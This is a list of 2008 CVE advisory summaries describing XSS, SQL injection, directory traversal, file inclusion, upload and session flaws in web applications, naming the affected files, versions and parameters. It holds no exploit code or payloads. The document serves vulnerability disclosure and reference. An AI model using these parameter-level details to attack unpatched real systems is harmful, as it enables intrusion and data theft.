[CVE-2008-2975] Cross-site scripting (XSS) vulnerability in admin/objects/obj_image.php in TinX/cms 1.1 allows remote attackers to inject arbitrary web script or HTML via the language parameter.
[CVE-2008-2973] Multiple cross-site scripting (XSS) vulnerabilities in chathead.php in MM Chat 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) sitename and (2) wmessage parameters.
[CVE-2008-2970] Multiple session fixation vulnerabilities in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allow remote attackers to hijack web sessions by setting the PHPSESSID parameter to (1) index.php and (2) login.php in homepg/.
[CVE-2008-2969] Directory traversal vulnerability in download.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to read arbitrary files via a .. (dot dot) in the dfile parameter.
[CVE-2008-2968] SQL injection vulnerability in rating.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to execute arbitrary SQL commands via the book_id parameter.
[CVE-2008-2967] Multiple cross-site scripting (XSS) vulnerabilities in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) query string to login.php and the (2) glb_sid parameter to hta/htmlarea.js.php, and allow remote authenticated users to inject arbitrary web script or HTML via an unspecified field in room.php.
[CVE-2008-2965] Cross-site scripting (XSS) vulnerability in viewforum.php in JaxUltraBB (JUBB) 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the forum parameter.
[CVE-2008-2962] Multiple cross-site scripting (XSS) vulnerabilities in MyBlog allow remote attackers to inject arbitrary web script or HTML via the (1) s and (2) sort parameters to index.php, and the (3) id parameter to post.php.
[CVE-2008-2960] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 2.11.7, when register_globals is enabled and .htaccess support is disabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving scripts in libraries/.
[CVE-2008-2951] Open redirect vulnerability in the search script in Trac before 0.10.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter, possibly related to the quickjump function.
[CVE-2008-2947] Cross-domain vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 7 allows remote attackers to access restricted information from other domains via JavaScript that uses the Object data type for the value of a (1) location or (2) location.href property, related to incorrect determination of the origin of web script, aka "Window Location Property Cross-Domain Vulnerability." NOTE: according to Microsoft, CVE-2008-2948 and CVE-2008-2949 are duplicates of this issue, probably different attack vectors.
[CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
[CVE-2008-2925] SQL injection vulnerability in Webmatic before 2.8 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2008-2924] Cross-site scripting (XSS) vulnerability in Webmatic before 2.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2923] Cross-site scripting (XSS) vulnerability in read/search/results in Lyris ListManager 8.8, 8.95, and 9.3d allows remote attackers to inject arbitrary web script or HTML via the words parameter.
[CVE-2008-2914] SQL injection vulnerability in jobseekers/JobSearch3.php (aka the search module) in PHP JOBWEBSITE PRO allows remote attackers to execute arbitrary SQL commands via the (1) kw or (2) position parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-2911] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Contenido 4.8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) contenido, (2) Belang, and (3) username parameters.
[CVE-2008-2907] SQL injection vulnerability in admin/index.php in WebChamado 1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the eml parameter.
[CVE-2008-2906] SQL injection vulnerability in lista_anexos.php in WebChamado 1.1 allows remote attackers to execute arbitrary SQL commands via the tsk_id parameter.
[CVE-2008-2903] SQL injection vulnerability in news.php in Advanced Webhost Billing System (AWBS) 2.3.3 through 2.7.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the viewnews parameter.
[CVE-2008-2878] Open redirect vulnerability in rss_getfile.php in Academic Web Tools (AWT YEKTA) 1.4.3.1, and 1.4.2.8 and earlier, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the file parameter.
[CVE-2008-2875] SQL injection vulnerability in index.php in Webdevindo-CMS 1.0.0 allows remote attackers to execute arbitrary SQL commands via the hal parameter.
[CVE-2008-2873] sHibby sHop 2.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request to Db/urun.mdb.
[CVE-2008-2871] Multiple cross-site scripting (XSS) vulnerabilities in template2.php in PEGames allow remote attackers to inject arbitrary web script or HTML via the (1) sitetitle, (2) sitenav, (3) sitemain, and (4) sitealt parameters. NOTE: the provenance of this information is unknown.
[CVE-2008-2861] Multiple cross-site scripting (XSS) vulnerabilities in eLineStudio Site Composer (ESC) 2.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topic and (2) button parameters to ansFAQ.asp and the (3) id and (4) txtEmail parameters to login.asp.
[CVE-2008-2860] SQL injection vulnerability in category.php in AJSquare AJ Auction Pro web 2.0 allows remote attackers to execute arbitrary SQL commands via the cate_id parameter.
[CVE-2008-2858] SQL injection vulnerability in index.php in WebChamado 1.1 allows remote attackers to execute arbitrary SQL commands via the eml parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-2855] Cross-site scripting (XSS) vulnerability in clanek.php in OwnRS Beta 3 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-2853] SQL injection vulnerability in index.php in Easy Webstore 1.2 allows remote attackers to execute arbitrary SQL commands via the cat_path parameter.
[CVE-2008-2852] Cross-site scripting (XSS) vulnerability in CGIWrap before 4.1, when an Internet Explorer based browser is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to failure to set the charset in error messages.
[CVE-2008-2849] Cross-site scripting (XSS) vulnerability in the TrailScout module 5.x before 5.x-1.4 for Drupal allows remote authenticated users, with create post permissions, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2848] Cross-site scripting (XSS) vulnerability in the search functionality in MindTouch DekiWiki before 8.05.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2842] Cross-site scripting (XSS) vulnerability in edit/showmedia.asp in doITLive CMS 2.50 and earlier allows remote attackers to inject arbitrary web script or HTML via the FILE parameter.
[CVE-2008-2839] Cross-site scripting (XSS) vulnerability in the search module in Traindepot 0.1 allows remote attackers to inject arbitrary web script or HTML via the query parameter to index.php.
[CVE-2008-2836] PHP remote file inclusion vulnerability in send_reminders.php in WebCalendar 1.0.4 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter and a 0 value for the noSet parameter, a different vector than CVE-2007-1483.
[CVE-2008-2832] Unrestricted file upload vulnerability in calendar_admin.asp in Full Revolution aspWebCalendar 2008 allows remote attackers to upload and execute arbitrary code via the FILE1 parameter in an uploadfileprocess action, probably followed by a direct request to the file in calendar/eventimages/.
[CVE-2008-2831] Multiple cross-site scripting (XSS) vulnerabilities in the delegated spam management feature in the Spam Quarantine Management (SQM) component in MailMarshal SMTP 6.0.3.8 through 6.3.0.0 allow user-assisted remote authenticated users to inject arbitrary web script or HTML via (1) the list of blocked senders or (2) the list of safe senders.
[CVE-2008-2825] Cross-site scripting (XSS) vulnerability in the embedded Web Server in Xerox WorkCentre M123, M128, and 133 and WorkCentre Pro 123, 128, and 133 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2817] SQL injection vulnerability in albums.php in NiTrO Web Gallery 1.4.3 and earlier allows remote attackers to execute arbitrary SQL commands via the CatId parameter in a show action.
[CVE-2008-2810] Mozilla Firefox before 2.0.0.15 and SeaMonkey before 1.1.10 do not properly identify the context of Windows shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site for which the user has previously saved a shortcut.
[CVE-2008-2809] Mozilla 1.9 M8 and earlier, Mozilla Firefox 2 before 2.0.0.15, SeaMonkey 1.1.5 and other versions before 1.1.10, Netscape 9.0, and other Mozilla-based web browsers, when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, regard the certificate as also accepted for all domain names in subjectAltName:dNSName fields, which makes it easier for remote attackers to trick a user into accepting an invalid certificate for a spoofed web site.
[CVE-2008-2797] Cross-site scripting (XSS) vulnerability in MainLayout.do in ManageEngine OpUtils 5.0 allows remote attackers to inject arbitrary web script or HTML via the hostName parameter, when viewing an SNMP graph. NOTE: the provenance of this information is unknown.
[CVE-2008-2788] Cross-site scripting (XSS) vulnerability in index.php in OpenDocMan 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the redirection parameter.
[CVE-2008-2787] Cross-site scripting (XSS) vulnerability in out.php in OpenDocMan 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the last_message parameter.
[CVE-2008-2783] Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware, Groupware Webmail Edition, and Kronolith allow remote attackers to inject arbitrary web script or HTML via the timestamp parameter to (1) week.php, (2) workweek.php, and (3) day.php.
[CVE-2008-2777] Cross-site scripting (XSS) vulnerability in Ortro before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2776] Cross-site scripting (XSS) vulnerability in search.asp in DT Centrepiece 4.0 allows remote attackers to inject arbitrary web script or HTML via the searchFor parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-2773] Cross-site scripting (XSS) vulnerability in the Taxonomy Image module 5.x before 5.x-1.3 and 6.x before 6.x-1.3, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2768] Cross-site scripting (XSS) vulnerability in admin/search.asp in Xigla Poll Manager XE allows remote authenticated users with administrator role privileges to inject arbitrary web script or HTML via unspecified vectors ("all fields").
[CVE-2008-2766] Cross-site scripting (XSS) vulnerability in Xigla Absolute Image Gallery XE allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) admin/search.asp and (2) gallery.asp.
[CVE-2008-2764] Cross-site scripting (XSS) vulnerability in admin/search.asp in Xigla Absolute Live Support XE 5.1 allows remote authenticated administrators to inject arbitrary web script or HTML via unspecified vectors ("all fields").
[CVE-2008-2761] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute Banner Manager XE 2.0 allow remote authenticated administrators to inject arbitrary web script or HTML via the text parameter in (1) searchbanners.asp and (2) listadvertisers.asp, and other unspecified fields. NOTE: some of these details are obtained from third party information.
[CVE-2008-2759] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute Form Processor XE 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) showfields, (2) text, and (3) submissions parameters to search.asp and the (4) name parameter to users.asp. NOTE: some of these details are obtained from third party information.
[CVE-2008-2758] Multiple cross-site scripting (XSS) vulnerabilities in Xigla Absolute News Manager XE 3.2 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) pblname and (2) text parameters to (a) admin/search.asp, (3) name parameter to (b) admin/publishers.asp, and other unspecified vectors to (c) anmviewer.asp and (d) editarticleX.asp in admin/. NOTE: some of these details are obtained from third party information.
[CVE-2008-2756] Cross-site scripting (XSS) vulnerability in admin/users.asp in Xigla Absolute Control Panel XE 1.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter and other unspecified parameters. NOTE: some of these details are obtained from third party information.
[CVE-2008-2744] Cross-site scripting (XSS) vulnerability in vBulletin 3.6.10 and 3.7.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors and an "obscure method." NOTE: the vector is probably in the redirect parameter to the Admin Control Panel (admincp/index.php).
[CVE-2008-2743] Cross-site scripting (XSS) vulnerability in the embedded web server in Xerox 4110, 4590, and 4595 Copier/Printers allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2008-2720] Cross-site scripting (XSS) vulnerability in Menalto Gallery before 2.2.5 allows remote attackers to inject arbitrary web script or HTML via the (1) host and (2) path components of a URL.
[CVE-2008-2718] Cross-site scripting (XSS) vulnerability in fe_adminlib.inc in TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, as used in extensions such as (1) direct_mail_subscription, (2) feuser_admin, and (3) kb_md5fepw, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2714] Opera before 9.26 allows remote attackers to misrepresent web page addresses using "certain characters" that "cause the page address text to be misplaced."
[CVE-2008-2700] SQL injection vulnerability in view.php in Galatolo WebManager 1.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-2699] Multiple directory traversal vulnerabilities in Galatolo WebManager (GWM) 1.0 allow remote attackers to include and execute arbitrary local files via directory traversal sequences in (1) the plugin parameter to admin/plugins.php or (2) the com parameter to index.php.
[CVE-2008-2698] Multiple cross-site scripting (XSS) vulnerabilities in photo_add-c.php (aka the "add comment" section) in WEBalbum 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) id, or (3) category parameter.
[CVE-2008-2694] Cross-site scripting (XSS) vulnerability in search.php in phpInv 0.8.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2008-2686] webinc/bxe/scripts/loadsave.php in Flux CMS 1.5.0 and earlier allows remote attackers to execute arbitrary code by overwriting a PHP file in webinc/bxe/scripts/ via a filename in the XML parameter and PHP sequences in the request body, then making a direct request for this filename.
[CVE-2008-2680] Multiple cross-site scripting (XSS) vulnerabilities in _db/compact.asp in Realm CMS 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) CmpctedDB and (2) Boyut parameters.
[CVE-2008-2677] Cross-site scripting (XSS) vulnerability in edit1.php in Telephone Directory 2008 allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2008-2675] Cross-site scripting (XSS) vulnerability in index.php in PHP Image Gallery allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-2668] Multiple cross-site scripting (XSS) vulnerabilities in yBlog 0.2.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) the q parameter to search.php, or the n parameter to (2) user.php or (3) uss.php.
[CVE-2008-2652] Multiple SQL injection vulnerabilities in catalog.php in SMEWeb 1.4b and 1.4f allow remote attackers to execute arbitrary SQL commands via the (1) idp and (2) category parameters.
[CVE-2008-2646] Multiple cross-site scripting (XSS) vulnerabilities in meBiblio 0.4.7 allow remote attackers to inject arbitrary web script or HTML via the (1) sql parameter to dbadd.inc.php, (2) InsertJournal parameter to add_journal_mask.inc.php, (3) InsertBibliography parameter to insert_mask.inc.php, and (4) LabelYear parameter to search_mask.inc.php.
[CVE-2008-2644] Multiple cross-site scripting (XSS) vulnerabilities in SMEWeb 1.4b and 1.4f allow remote attackers to inject arbitrary web script or HTML via the (1) data parameter to catalog.php, the (2) keyword parameter to search.php, the (3) page parameter to bb.php, and the (4) new_s parameter to order.php.
[CVE-2008-2640] Multiple cross-site scripting (XSS) vulnerabilities in the Flex 3 History Management feature in Adobe Flex 3.0.1 SDK and Flex Builder 3, and generated applications, allow remote attackers to inject arbitrary web script or HTML via the anchor identifier to (1) client-side-detection-with-history/history/historyFrame.html, (2) express-installation-with-history/history/historyFrame.html, or (3) no-player-detection-with-history/history/historyFrame.html in templates/html-templates/. NOTE: Firefox 2.0 and possibly other browsers prevent exploitation.
[CVE-2008-2638] Static code injection vulnerability in guestbook.php in 1Book 1.0.1 and earlier allows remote attackers to upload arbitrary PHP code via the message parameter in an HTML webform, which is written to data.php.
[CVE-2008-2637] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN 6.0.2 hotfix 3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via quotes in (1) the css_exceptions parameter in vdesk/admincon/webyfiers.php and (2) the sql_matchscope parameter in vdesk/admincon/index.php.
[CVE-2008-2636] The HTTP service on the Cisco Linksys WRH54G with firmware 1.01.03 allows remote attackers to cause a denial of service (management interface outage) or possibly execute arbitrary code via a URI that begins with a "/./" sequence, contains many instances of a "front_page" sequence, and ends with a ".asp" sequence.
[CVE-2008-2635] Multiple directory traversal vulnerabilities in BitKinex 2.9.3 allow remote FTP and WebDAV servers to create or overwrite arbitrary files via a .. (dot dot) in (1) a response to a LIST command from the BitKinex FTP client and (2) a response to a PROPFIND command from the BitKinex WebDAV client. NOTE: this can be leveraged for code execution by writing to a Startup folder.
[CVE-2008-2631] The WordClient interface in Alt-N Technologies MDaemon 9.6.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted HTTP POST request. NOTE: the provenance of this information is unknown.
[CVE-2008-2603] Unspecified vulnerability in the Resource Manager component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6, and Database Control in Enterprise Manager, has unknown impact and remote authenticated attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this is a cross-site scripting (XSS) issue that allows remote attackers to inject arbitrary web script or HTML via the REFRESHCHOICE parameter in multiple web pages.
[CVE-2008-2582] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors.
[CVE-2008-2581] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors related to UDDI Explorer.
[CVE-2008-2580] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 has unknown impact and remote attack vectors.
[CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
[CVE-2008-2578] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 and 9.2 MP1 has unknown impact and local attack vectors.
[CVE-2008-2577] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2 MP1 has unknown impact and remote authenticated attack vectors.
[CVE-2008-2576] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2, 9.1, 9.0, and 8.1 SP6 has unknown impact and local attack vectors.
[CVE-2008-2567] Cross-site scripting (XSS) vulnerability in Fenriru Sleipnir 2.7.1 Release2 and earlier, Portable Sleipnir 2.7.1 Release2 and earlier, and Grani 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a history mechanism and favorites search, a different vulnerability than CVE-2007-6002.
[CVE-2008-2566] Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the group parameter to (1) index.php or (2) the default URI.
[CVE-2008-2563] Multiple cross-site scripting (XSS) vulnerabilities in (1) dsp_main.php and (2) dsp_task_editor.php in SamTodo 1.1 allow remote attackers to inject arbitrary web script or HTML via the (a) tid parameter in a main.taskeditor edit action, and the (b) completed parameter in a main.default action, to index.php.
[CVE-2008-2561] Multiple cross-site scripting (XSS) vulnerabilities in 427BB 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to (a) register.php, (b) reminder.php, and (c) search.php.
[CVE-2008-2557] Cross-site scripting (XSS) vulnerability in CRE Loaded 6.2.13.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) Links and (2) Links Submit pages.
[CVE-2008-2553] Cross-site scripting (XSS) vulnerability in Slashdot Like Automated Storytelling Homepage (Slash) (aka Slashcode) R_2_5_0_94 and earlier allows remote attackers to inject arbitrary web script or HTML via the userfield parameter.
[CVE-2008-2550] Unspecified vulnerability in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.17 has unknown impact and attack vectors related to an attribute in the SOAP security header.
[CVE-2008-2533] Multiple cross-site scripting (XSS) vulnerabilities in Phoenix View CMS Pre Alpha2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ltarget parameter to (a) admin/admin_frame.php and the (2) conf parameter to (b) gbuch.admin.php, (c) links.admin.php, (d) menue.admin.php, (e) news.admin.php, and (f) todo.admin.php in admin/module/.
[CVE-2008-2531] Cross-site scripting (XSS) vulnerability in the search script in Build A Niche Store (BANS) 3.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2008-2527] Cross-site scripting (XSS) vulnerability in view.php in ActualScripts ActualAnalyzer Server 8.37 and earlier, ActualAnalyzer Gold 7.74 and earlier, ActualAnalyzer Pro 6.95 and earlier, and ActualAnalyzer Lite 2.78 and earlier allows remote attackers to inject arbitrary web script or HTML via the language parameter.
[CVE-2008-2526] Cross-site scripting (XSS) vulnerability in the WT Gallery (aka wt_gallery) extension 2.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2525] Cross-site scripting (XSS) vulnerability in the Event Database (aka rlmp_eventdb) extension before 1.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2518] Cross-site scripting (XSS) vulnerability in the advanced search mechanism (webapps/search/advanced.jsp) in Sun Java System Web Server 6.1 before SP9 and 7.0 before Update 3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to the next parameter.
[CVE-2008-2508] Cross-site scripting (XSS) vulnerability in news.php in Tr Script News 2.1 allows remote attackers to inject arbitrary web script or HTML via the "nb" parameter in voir mode.
[CVE-2008-2507] Cross-site scripting (XSS) vulnerability in Calcium40.pl in Brown Bear Software Calcium 3.10 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the CalendarName parameter in a ShowIt action.
[CVE-2008-2506] Multiple SQL injection vulnerabilities in Simpel Side Weblosning 1 through 4 allow remote attackers to execute arbitrary SQL commands via the (1) mainid and (2) id parameters to index2.php.
[CVE-2008-2505] Cross-site scripting (XSS) vulnerability in result.php in Simpel Side Weblosning 1 through 4 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2008-2502] Unspecified vulnerability in the web server in eMule X-Ray before 1.4 allows remote attackers to trigger memory corruption via unknown attack vectors.
[CVE-2008-2500] Cross-site scripting (XSS) vulnerability in the MOStlyContent Editor (MOStlyCE) component before 3.0 for Mambo allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2496] Multiple cross-site scripting (XSS) vulnerabilities in Quate CMS 0.3.4 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) login.php, and (3) credits.php in admin/, and (4) upgrade/index.php.
[CVE-2008-2494] Cross-site scripting (XSS) vulnerability in index.php in Zina 1.0 RC3 allows remote attackers to inject arbitrary web script or HTML via the l parameter.
[CVE-2008-2493] Cross-site scripting (XSS) vulnerability in post3/Book.asp in Campus Bulletin Board 3.4 allows remote attackers to inject arbitrary web script or HTML via the review parameter.
[CVE-2008-2490] Cross-site scripting (XSS) vulnerability in the KJ Image Lightbox 2 (aka kj_imagelightbox2) extension 1.4.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified "user input."
[CVE-2008-2487] SQL injection vulnerability in index.php in MAXSITE 1.10 and earlier allows remote attackers to execute arbitrary SQL commands via the category parameter in a webboard action.
[CVE-2008-2485] Cross-site scripting (XSS) vulnerability in the URL redirection script (inc/url_redirection.inc.php) in PCPIN Chat before 6.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-2470] The InstallShield Update Service Agent ActiveX control in isusweb.dll allows remote attackers to cause a denial of service (memory corruption and browser crash) and possibly execute arbitrary code via a call to ExecuteRemote with a URL that results in a 404 error response.
[CVE-2008-2462] Cross-site scripting (XSS) vulnerability in the viewfile documentation command in Caucho Resin before 3.0.25, and 3.1.x before 3.1.4, allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2008-2458] Cross-site scripting (XSS) vulnerability in index.php in Starsgames Control Panel 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the st parameter.
[CVE-2008-2452] Cross-site scripting (XSS) vulnerability in the Questionaire (aka pbsurvey) extension 1.2.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2450] Multiple cross-site scripting (XSS) vulnerabilities in the Statistics (aka ke_stats) extension 0.1.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2449] Multiple cross-site scripting (XSS) vulnerabilities in Isaac McGowan phpInstantGallery 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) gallery parameter to (a) index.php and (b) image.php, and the (2) imgnum parameter to image.php. NOTE: the provenance of this information is unknown.
[CVE-2008-2446] Multiple SQL injection vulnerabilities in Web Group Communication Center (WGCC) 1.0.3 PreRelease 1 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) userid parameter to (a) profile.php in a "show moreinfo" action
[CVE-2008-2445] Cross-site scripting (XSS) vulnerability in profile.php in Web Group Communication Center (WGCC) 1.0.3 PreRelease 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the userid parameter in a show action.
[CVE-2008-2433] The web management console in Trend Micro OfficeScan 7.0 through 8.0, Worry-Free Business Security 5.0, and Client/Server/Messaging Suite 3.5 and 3.6 creates a random session token based only on the login time, which makes it easier for remote attackers to hijack sessions via brute-force attacks. NOTE: this can be leveraged for code execution through an unspecified "manipulation of the configuration."
[CVE-2008-2422] SQL injection vulnerability in index.php in Web Slider 0.6 allows remote attackers to execute arbitrary SQL commands via the slide parameter in a slides action. NOTE: the provenance of this information is unknown.
[CVE-2008-2421] Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/.
[CVE-2008-2417] SQL injection vulnerability in showQAnswer.asp in How2ASP.net Webboard 4.1 allows remote attackers to execute arbitrary SQL commands via the qNo parameter.
[CVE-2008-2414] Cross-site scripting (XSS) vulnerability in send_email.php in AN Guestbook (ANG) 0.4 allows remote attackers to inject arbitrary web script or HTML via the postid parameter.
[CVE-2008-2413] Cross-site scripting (XSS) vulnerability in glossaire.php in ACGV News 0.9.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-2410] Cross-site scripting (XSS) vulnerability in the servlet engine and Web container in the Web Server service in IBM Lotus Domino before 7.0.3 FP1, and 8.x before 8.0.1, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2402] The Admin Server in Sun Java Active Server Pages (ASP) Server before 4.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read password hashes and configuration data via direct requests for unspecified documents.
[CVE-2008-2398] Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
[CVE-2008-2397] Cross-site scripting (XSS) vulnerability in search-results.dot in dotCMS 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-2379] Cross-site scripting (XSS) vulnerability in SquirrelMail before 1.4.17 allows remote attackers to inject arbitrary web script or HTML via a crafted hyperlink in an HTML part of an e-mail message.
[CVE-2008-2356] SQL injection vulnerability in index.php in Archangel Weblog 0.90.02 and earlier allows remote attackers to execute arbitrary SQL commands via the post_id parameter.
[CVE-2008-2351] Multiple SQL injection vulnerabilities in index.php in CMS WebManager-Pro allow remote attackers to execute arbitrary SQL commands via the (1) lang_id and (2) menu_id parameters.
[CVE-2008-2344] Cross-site scripting (XSS) vulnerability in the air_filemanager 0.6.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2339] SQL injection vulnerability in index.php in Turnkey Web Tools SunShop Shopping Cart 3.5.1 allows remote attackers to execute arbitrary SQL commands via the id parameter in an item action, a different vector than CVE-2008-2038, CVE-2007-4597, and CVE-2007-2549.
[CVE-2008-2335] Cross-site scripting (XSS) vulnerability in search_results.php in Vastal I-Tech phpVID 1.1 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-2333] Cross-site scripting (XSS) vulnerability in ldap_test.cgi in Barracuda Spam Firewall (BSF) before 3.5.11.025 allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2008-2318] The WOHyperlink implementation in WebObjects in Apple Xcode tools before 3.1 appends local session IDs to generated non-local URLs, which allows remote attackers to obtain potentially sensitive information by reading the requests for these URLs.
[CVE-2008-2317] WebCore in Apple Safari does not properly perform garbage collection of JavaScript document elements, which allows remote attackers to execute arbitrary code or cause a denial of service (heap corruption and application crash) via a reference to the ownerNode property of a copied CSSStyleSheet object of a STYLE element, as originally demonstrated on Apple iPhone before 2.0 and iPod touch before 2.0, a different vulnerability than CVE-2008-1590.
[CVE-2008-2307] Unspecified vulnerability in WebKit in Apple Safari before 3.1.2, as distributed in Mac OS X before 10.5.4, and standalone for Windows and Mac OS X 10.4, allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via vectors involving JavaScript arrays that trigger memory corruption.
[CVE-2008-2302] Cross-site scripting (XSS) vulnerability in the login form in the administration application in Django 0.91 before 0.91.2, 0.95 before 0.95.3, and 0.96 before 0.96.2 allows remote attackers to inject arbitrary web script or HTML via the URI of a certain previous request.
